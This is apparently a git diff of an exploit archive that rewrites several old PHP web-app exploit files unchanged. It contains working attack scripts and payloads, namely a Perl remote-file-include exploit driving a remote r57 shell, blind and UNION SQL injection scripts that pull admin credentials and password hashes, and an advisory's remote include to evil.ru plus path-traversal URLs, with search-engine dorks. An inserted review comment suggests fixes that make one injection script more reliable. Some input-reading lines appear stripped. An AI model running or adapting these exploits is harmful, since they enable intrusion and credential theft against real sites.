- $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
- $res = $xpl->request($req);
- $r = $res->content;
- $r =~ tr/[\n]/[ê]/;
-
- if (@ARGV[4] eq "-r")
- {
- print $r;
- }
- elsif (@ARGV[5] eq "-p")
- {
- # if not working change cmd variable to null and apply patch manually.
- $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
- print q
- {
-
- }
- }
- else
- {
- print "[cmd]\$";
- $cmd = ;
- }
-}
-
-sub header()
-{
- print q
- {
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Discovered by : Ciph3r
- phportal.pl - Remote File Include Exploit
- SP tanx4: Iranian hacker & Kurdish security TEAM
- Ciph3r_blackhat@yahoo.com
- sp TANX2: milw0rm.com & google.com & sourceforge.net
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- };
-}
-
-sub usage()
-{
-header();
- print q
- {
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Usage:
-perl phportal.pl <-r> <-p>
- - Path to target eg: www.victim.com
- - Path to shell eg: http://h1.ripway.com/boukan/r57.txt?
- - Shell command variable name eg: Pwd
- - Show output from shell
-

    - sablonlar/gunaysoft/gunaysoft.php
-Example:
-perl phportal.pl http://localhost/include http://localhost/r57.php cmd -r -p
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- };
-exit();
-}
-
-# milw0rm.com [2008-07-02]
+#!/usr/bin/perl
+
+####################################################################################################
+#
+# phportal_1.2_Beta (gunaysoft.php) Remote File Include Vulnerability
+#
+# Discovered by : Ciph3r
+#
+# Class: Remote File Include Vulnerability
+#
+# exemplary Exp:
+# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=[shell]
+# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
+# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
+#
+# Remote: Yes
+#
+# Type: Highly critical
+#
+# Vulnerable Code: include($icerikyolu.$sayfaid.$uzanti);
+#
+# Download: http://sourceforge.net/project/showfiles.php?group_id=205263
+#
+# SP tanx4: Iranian hacker & Kurdish security TEAM
+#
+# sp TANX2: milw0rm.com & google.com & sourceforge.net
+#
+# Exploit: phportal.pl
+#
+# About phPortal :
+#
+# phPortal is a Content Management System. phPortal contains phpBB2 core and
+# phPortal shell. If you have a phpBB2 forum.You may upgrade to phPortal.
+#
+######################################################################################################
+
+use LWP::UserAgent;
+use LWP::Simple;
+
+$target = @ARGV[0];
+$shellsite = @ARGV[1];
+$shellcmd = @ARGV[2];
+$file = "sablonlar/gunaysoft/gunaysoft.php?uzanti=";
+
+if(!$target || !$shellsite)
+{
+ usage();
+}
+
+header();
+
+print "Type 'exit' to quit";
+print "[cmd]\$";
+$cmd = ;
+
+while ($cmd !~ "exit")
+{
+ $xpl = LWP::UserAgent->new() or die;
+ $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
+ $res = $xpl->request($req);
+ $r = $res->content;
+ $r =~ tr/[\n]/[ê]/;
+
+ if (@ARGV[4] eq "-r")
+ {
+ print $r;
+ }
+ elsif (@ARGV[5] eq "-p")
+ {
+ # if not working change cmd variable to null and apply patch manually.
+ $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
+ print q
+ {
+
+ }
+ }
+ else
+ {
+ print "[cmd]\$";
+ $cmd = ;
+ }
+}
+
+sub header()
+{
+ print q
+ {
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ Discovered by : Ciph3r
+ phportal.pl - Remote File Include Exploit
+ SP tanx4: Iranian hacker & Kurdish security TEAM
+ Ciph3r_blackhat@yahoo.com
+ sp TANX2: milw0rm.com & google.com & sourceforge.net
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ };
+}
+
+sub usage()
+{
+header();
+ print q
+ {
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Usage:
+perl phportal.pl <-r> <-p>
+ - Path to target eg: www.victim.com
+ - Path to shell eg: http://h1.ripway.com/boukan/r57.txt?
+ - Shell command variable name eg: Pwd
+ - Show output from shell
+

    - sablonlar/gunaysoft/gunaysoft.php
+Example:
+perl phportal.pl http://localhost/include http://localhost/r57.php cmd -r -p
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ };
+exit();
+}
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5997.pl b/platforms/php/webapps/5997.pl
index 84fdb10a0..4aeeb4a96 100755
--- a/platforms/php/webapps/5997.pl
+++ b/platforms/php/webapps/5997.pl
@@ -1,63 +1,63 @@ -#/usr/bin/perl - -#|+| Vendor Not Notified -#|+| Author: Bl@ckbe@rD -#|+| Discovered On: 10 june 2008 -#|+| greetz: InjEctOrs , underz0ne crew -#--//--> -# -- CMS webBlizzard Blind SQL Injection Exploit -- -#--//--> Exploit : -use strict; -use LWP::Simple; - -print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n"; -print "- -\n"; -print "- -\n"; -print "- -\n"; -print "- CMS WebBlizzard Blind SQL Injection exploit -\n"; -print "- -\n"; -print "- -\n"; -print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n"; - -print "\nEnter URL (ie: http://site.com): "; - chomp(my $url=); - -if(inject_test($url)) { - print "Injecting.. Please Wait this could take several minutes..\n\n"; - my $details = blind($url); - print "Exploit Success! Admin Details: ".$details; - exit; -} - -sub blind { - - my $url = shift; - my $res = undef; - my $chr = 48; - my $substr = 1; - my $done = 1; - - while($done) { - my $content = get($url."/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM -mysql.user),".$substr.",1))=".$chr."/*"); - - if($content =~ /Previous/ && $chr == 94) { $done = 0; } - elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } - else { $chr++; } - } - return $res; -} - -sub inject_test { - - my $url = shift; - my $true = get($url."/index.php?page=6) and 1=1 /*"); - my $false = get($url."/index.php?page=6) and 1=2 /*"); - - if($true =~ /Previous/ && $false !~ /Previous/) { - print "\nTarget Site Vulnerable!\n\n"; - return 1; - } else { print "\nTarget Site Not Vulnerable! 
Exiting..\n"; exit; } -} - -# milw0rm.com [2008-07-03] +#/usr/bin/perl + +#|+| Vendor Not Notified +#|+| Author: Bl@ckbe@rD +#|+| Discovered On: 10 june 2008 +#|+| greetz: InjEctOrs , underz0ne crew +#--//--> +# -- CMS webBlizzard Blind SQL Injection Exploit -- +#--//--> Exploit : +use strict; +use LWP::Simple; + +print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n"; +print "- -\n"; +print "- -\n"; +print "- -\n"; +print "- CMS WebBlizzard Blind SQL Injection exploit -\n"; +print "- -\n"; +print "- -\n"; +print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n"; + +print "\nEnter URL (ie: http://site.com): "; + chomp(my $url=); + +if(inject_test($url)) { + print "Injecting.. Please Wait this could take several minutes..\n\n"; + my $details = blind($url); + print "Exploit Success! Admin Details: ".$details; + exit; +} + +sub blind { + + my $url = shift; + my $res = undef; + my $chr = 48; + my $substr = 1; + my $done = 1; + + while($done) { + my $content = get($url."/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM +mysql.user),".$substr.",1))=".$chr."/*"); + + if($content =~ /Previous/ && $chr == 94) { $done = 0; } + elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } + else { $chr++; } + } + return $res; +} + +sub inject_test { + + my $url = shift; + my $true = get($url."/index.php?page=6) and 1=1 /*"); + my $false = get($url."/index.php?page=6) and 1=2 /*"); + + if($true =~ /Previous/ && $false !~ /Previous/) { + print "\nTarget Site Vulnerable!\n\n"; + return 1; + } else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; } +} + +# milw0rm.com [2008-07-03] diff --git a/platforms/php/webapps/5998.txt b/platforms/php/webapps/5998.txt index fa313fd42..7b6e3c878 100755 --- a/platforms/php/webapps/5998.txt +++ b/platforms/php/webapps/5998.txt 
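Review bot: The character-search loop in `blind` has no upper bound on `$chr`: the `else { $chr++; }` branch keeps incrementing forever when no page matches `/Previous/` for the current position (target stops responding, the column contains a byte outside the tested range, or `get()` returns undef and the regex silently fails), so the script hangs instead of reporting failure. A bound on the retry, e.g. `else { die "No match at position $substr, giving up\n" if ++$chr > 126; }`, keeps the same search order for the printable range and turns the hang into a diagnostic. The `chomp(my $url=);` line also appears to have lost its `<STDIN>` read (the angle brackets look stripped in the committed text), which would make the file a syntax error under `use strict` as stored; worth confirming against the original submission.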
@@ -1,34 +1,34 @@ - ____ _ _ _ ___ __ _ __ - / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ -| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | -| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | - \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ----------------------------------------------------------------------------|___/ -Exploit found by sToRm - - -phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online) -SQL Injection - - -SQL Injection -------------- - -index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user-- - - -$id_kat=$_GET[id_kat]; -$m_conn = db_connect(); -if ((empty($id_kat))||($id_kat=='')) - $m_sql = "select * from berita where status='tampil' and order by tgl desc"; -else - $m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc"; - - -Here, we have a classic SQL MySQL injection. The GET variable "id_kat" isn't sanitized before being passed to the query. By injecting our string, the query becomes: - -select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc - -The comment renders the rest of the query to be useless. We are effectively grabbing the first user from the table "user", which is the admin. You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply. 
- -# milw0rm.com [2008-07-03] + ____ _ _ _ ___ __ _ __ + / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ +| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | +| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | + \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | +---------------------------------------------------------------------------|___/ +Exploit found by sToRm + + +phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online) +SQL Injection + + +SQL Injection +------------- + +index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user-- + + +$id_kat=$_GET[id_kat]; +$m_conn = db_connect(); +if ((empty($id_kat))||($id_kat=='')) + $m_sql = "select * from berita where status='tampil' and order by tgl desc"; +else + $m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc"; + + +Here, we have a classic SQL MySQL injection. The GET variable "id_kat" isn't sanitized before being passed to the query. By injecting our string, the query becomes: + +select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc + +The comment renders the rest of the query to be useless. We are effectively grabbing the first user from the table "user", which is the admin. You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply. + +# milw0rm.com [2008-07-03] diff --git a/platforms/php/webapps/5999.txt b/platforms/php/webapps/5999.txt index fd2e9a5c3..8c14f423b 100755 --- a/platforms/php/webapps/5999.txt +++ b/platforms/php/webapps/5999.txt 
@@ -1,29 +1,29 @@
-#######################################################################################
-#
-# ...:::::phpwebnews-mysql 0.2 SQL Injection Vulnerability ::::....
-#
-#######################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-=================================================================================
-Discoverd By :virangar security team
-
-User In Virangar : d4v00d_cr4ck3r
-=================================================================================
-Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra
-
-& All virangar Members & All hackerz
- =================================================================================
-Download:
-http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
- =================================================================================
-expl0it:
-http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
- =================================================================================
-Young Iranian h4ck3rz
-=================================================================================
-
-# milw0rm.com [2008-07-03]
+#######################################################################################
+#
+# ...:::::phpwebnews-mysql 0.2 SQL Injection Vulnerability ::::....
+#
+#######################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+=================================================================================
+Discoverd By :virangar security team
+
+User In Virangar : d4v00d_cr4ck3r
+=================================================================================
+Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra
+
+& All virangar Members & All hackerz
+ =================================================================================
+Download:
+http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
+ =================================================================================
+expl0it:
+http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
+ =================================================================================
+Young Iranian h4ck3rz
+=================================================================================
+
+# milw0rm.com [2008-07-03]
diff --git a/platforms/php/webapps/6001.txt b/platforms/php/webapps/6001.txt
index fd2e9a5c3..8c14f423b 100755
--- a/platforms/php/webapps/6001.txt
+++ b/platforms/php/webapps/6001.txt
@@ -1,336 +1,336 @@ -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-027 - - -Application: 1024 CMS -Versions Affected: 1.4.3, 1.4.4 RFC -Vendor URL: http://www.1024cms.com/ -Bug: Multiple Remote/Local File Include -Exploits: YES -Reported: 18.06.2008 -Second report: 27.06.2008 -Vendor Response: NONE -Solution: NONE -Date of Public Advisory: 04.07.2008 -Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Description -*********** - - -1024 CMS has Remote File Include vulnerability and multiple Local File Include vulnerabilities. - - -1. Remote/Local File Include vulnerabilities found in scripts: - -themes/blog/layouts/standard.php -themes/default/layouts/standard.php -themes/portfolio/layouts/standard.php -themes/snazzy/layouts/standard.php - -Code -**** -################################################# - - -

    - - -################################################# - -Example: - -http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php -http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 -http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00 - - - - - -Multiple Local File Include vulnerabilities: - - - - -2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php - -Code -**** -################################################# - -if(isset($_GET['t'])) { - switch($_GET['t']) { - case "forum": - include("../admin/lang/".$lang."/reports/ops/forum.php"); - break; - - case "download": - include("../admin/lang/".$lang."/reports/ops/download.php"); - break; - - case "news": - include("../admin/lang/".$lang."/reports/ops/news.php"); - break; - } -} else die("You cannot access this page directly"); - -################################################# - -Example: - -http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00 - - -3. Local File Include vulnerabilities found in scripts: - -admin/ops/admins/default.php -admin/ops/reports/ops/download.php -admin/ops/reports/ops/forum.php -admin/ops/reports/ops/news.php - -Code -**** -################################################# - - -... - -################################################# - -Example: - -http://[server]/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 - - -9. Local File Include vulnerabilities found in scripts: - -themes/blog/layouts/basic_header.php -themes/default/layouts/basic_header.php -themes/portfolio/layouts/basic_header.php -themes/snazzy/layouts/basic_header.php - -Code -**** -################################################# - -... -
    - - -################################################# - -Example: - -http://[server]/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 -http://[server]/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00 - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. - - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-07-04] +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-027 + + +Application: 1024 CMS +Versions Affected: 1.4.3, 1.4.4 RFC +Vendor URL: http://www.1024cms.com/ +Bug: Multiple Remote/Local File Include +Exploits: YES +Reported: 18.06.2008 +Second report: 27.06.2008 +Vendor Response: NONE +Solution: NONE +Date of Public Advisory: 04.07.2008 +Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + + +1024 CMS has Remote File Include vulnerability and multiple Local File Include vulnerabilities. + + +1. Remote/Local File Include vulnerabilities found in scripts: + +themes/blog/layouts/standard.php +themes/default/layouts/standard.php +themes/portfolio/layouts/standard.php +themes/snazzy/layouts/standard.php + +Code +**** +################################################# + + +
    + + +################################################# + +Example: + +http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php +http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 +http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00 + + + + + +Multiple Local File Include vulnerabilities: + + + + +2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php + +Code +**** +################################################# + +if(isset($_GET['t'])) { + switch($_GET['t']) { + case "forum": + include("../admin/lang/".$lang."/reports/ops/forum.php"); + break; + + case "download": + include("../admin/lang/".$lang."/reports/ops/download.php"); + break; + + case "news": + include("../admin/lang/".$lang."/reports/ops/news.php"); + break; + } +} else die("You cannot access this page directly"); + +################################################# + +Example: + +http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00 + + +3. Local File Include vulnerabilities found in scripts: + +admin/ops/admins/default.php +admin/ops/reports/ops/download.php +admin/ops/reports/ops/forum.php +admin/ops/reports/ops/news.php + +Code +**** +################################################# + + +... + +################################################# + +Example: + +http://[server]/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 + + +9. Local File Include vulnerabilities found in scripts: + +themes/blog/layouts/basic_header.php +themes/default/layouts/basic_header.php +themes/portfolio/layouts/basic_header.php +themes/snazzy/layouts/basic_header.php + +Code +**** +################################################# + +... +
    + + +################################################# + +Example: + +http://[server]/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 +http://[server]/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00 + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-07-04] diff --git a/platforms/php/webapps/6002.pl b/platforms/php/webapps/6002.pl index 05da737a2..e8bee6969 100755 --- a/platforms/php/webapps/6002.pl +++ b/platforms/php/webapps/6002.pl 
@@ -1,65 +1,65 @@ -#!/usr/bin/perl -w - -# Joomla Component altas v 1.0 Multiple Remote SQL Injection -# variables vuln : ( ano ) & ( mes ) - -#[*] Found by : Houssamix From H-T Team - -#[*] H-T Team [ HouSSaMix + ToXiC350 ] -#[*] Greetz : Islamic Security Team & and all musulmans hackers - -#[*] Component_Name: altas -#[*] Script_Name: Joomla -#[*] Dork : index.php?option=com_altas - -# altas -# 10/09/2007 -# Ilimitada Hosting Co. -# (c) 2007 -# soporte@ilihost.com -# www.ilihost.com -# 1.0 - -system("color f"); -print "\t\t========================================================\n\n"; -print "\t\t# Viva Islam #\n\n"; -print "\t\t========================================================\n\n"; -print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n"; -print "\t\t========================================================\n\n"; -print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n"; -print "\t\t========================================================\n\n"; - -use LWP::UserAgent; - -print "\nEnter your Target (http://site.com/joomla/): "; - chomp(my $target=); - -$uname="username"; -$magic="jos_users"; - -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - -$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**"; -$res = $b->request(HTTP::Request->new(GET=>$host)); -$answer = $res->content; - -print "\n[+] The Target : ".$target.""; - -if ($answer =~ /(.*?)/){ - - print "\n[+] Admin User : $1"; -} -$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--"; -$res2 = $b->request(HTTP::Request->new(GET=>$host2)); -$answer = $res2->content; -if ($answer =~/([0-9a-fA-F]{32})/){ - print "\n[+] Admin Hash : $1\n\n"; - print "# Exploit succeed! 
#\n\n"; -} -else{print "\n[-] Exploit Failed...\n"; -} - -# coded by Houssamix From H-T Team - -# milw0rm.com [2008-07-04] +#!/usr/bin/perl -w + +# Joomla Component altas v 1.0 Multiple Remote SQL Injection +# variables vuln : ( ano ) & ( mes ) + +#[*] Found by : Houssamix From H-T Team + +#[*] H-T Team [ HouSSaMix + ToXiC350 ] +#[*] Greetz : Islamic Security Team & and all musulmans hackers + +#[*] Component_Name: altas +#[*] Script_Name: Joomla +#[*] Dork : index.php?option=com_altas + +# altas +# 10/09/2007 +# Ilimitada Hosting Co. +# (c) 2007 +# soporte@ilihost.com +# www.ilihost.com +# 1.0 + +system("color f"); +print "\t\t========================================================\n\n"; +print "\t\t# Viva Islam #\n\n"; +print "\t\t========================================================\n\n"; +print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n"; +print "\t\t========================================================\n\n"; +print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n"; +print "\t\t========================================================\n\n"; + +use LWP::UserAgent; + +print "\nEnter your Target (http://site.com/joomla/): "; + chomp(my $target=); + +$uname="username"; +$magic="jos_users"; + +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + +$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; + +print "\n[+] The Target : ".$target.""; + +if ($answer =~ /(.*?)/){ + + print "\n[+] Admin User : $1"; +} +$host2 = $target . 
"index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--"; +$res2 = $b->request(HTTP::Request->new(GET=>$host2)); +$answer = $res2->content; +if ($answer =~/([0-9a-fA-F]{32})/){ + print "\n[+] Admin Hash : $1\n\n"; + print "# Exploit succeed! #\n\n"; +} +else{print "\n[-] Exploit Failed...\n"; +} + +# coded by Houssamix From H-T Team + +# milw0rm.com [2008-07-04] diff --git a/platforms/php/webapps/6003.txt b/platforms/php/webapps/6003.txt index 702b34c49..f0e61708a 100755 --- a/platforms/php/webapps/6003.txt +++ b/platforms/php/webapps/6003.txt 
@@ -1,32 +1,32 @@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@JOOmla com_dbquery Remote file Inclusion@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ Author:SsEs -@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ Contact:h4cks.in@gmail.com -@@@@@@@@@@@@@@@@@ Greetss: www.h4cks.in ||| www.1919turk.org || www.illegalsecurity.us ||| www.siberaskerler.org || -@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ Dork: inurl:"com_dbquery" OR "index.php?option=com_dbquery" -@@@@@@@@@@@@@@@@@ **Bug: -@@@@@@@@@@@@@@@@@ administrator\components\com_dbquery\classes\DBQ\admin\common.class.php on line 6 -@@@@@@@@@@@@@@@@@ global $mosConfig_absolute_path; -@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ require_once($mosConfig_absolute_path.’/components/com_dbquery/classes/DBQ/common.class.php’); -@@@@@@@@@@@@@@@@@ -@@@@@@@@@@@@@@@@@ http://sitename.com/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path= -@@@@@@@@@@@@@@@@@ - -side note: - DBQuery - February 2007 - Green Mountain Information Technology Consulting - This component is released under the GNU/GPL License - consulting@gmitc.biz - - http://www.gmitc.biz - 1.4.1 Final - Database Query is a Joomla query manager. 
- -# milw0rm.com [2008-07-04] +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@JOOmla com_dbquery Remote file Inclusion@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ Author:SsEs +@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ Contact:h4cks.in@gmail.com +@@@@@@@@@@@@@@@@@ Greetss: www.h4cks.in ||| www.1919turk.org || www.illegalsecurity.us ||| www.siberaskerler.org || +@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ Dork: inurl:"com_dbquery" OR "index.php?option=com_dbquery" +@@@@@@@@@@@@@@@@@ **Bug: +@@@@@@@@@@@@@@@@@ administrator\components\com_dbquery\classes\DBQ\admin\common.class.php on line 6 +@@@@@@@@@@@@@@@@@ global $mosConfig_absolute_path; +@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ require_once($mosConfig_absolute_path.’/components/com_dbquery/classes/DBQ/common.class.php’); +@@@@@@@@@@@@@@@@@ +@@@@@@@@@@@@@@@@@ http://sitename.com/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path= +@@@@@@@@@@@@@@@@@ + +side note: + DBQuery + February 2007 + Green Mountain Information Technology Consulting + This component is released under the GNU/GPL License + consulting@gmitc.biz + + http://www.gmitc.biz + 1.4.1 Final + Database Query is a Joomla query manager. + +# milw0rm.com [2008-07-04] diff --git a/platforms/php/webapps/6006.php b/platforms/php/webapps/6006.php index b22e77af1..af4ddde33 100755 --- 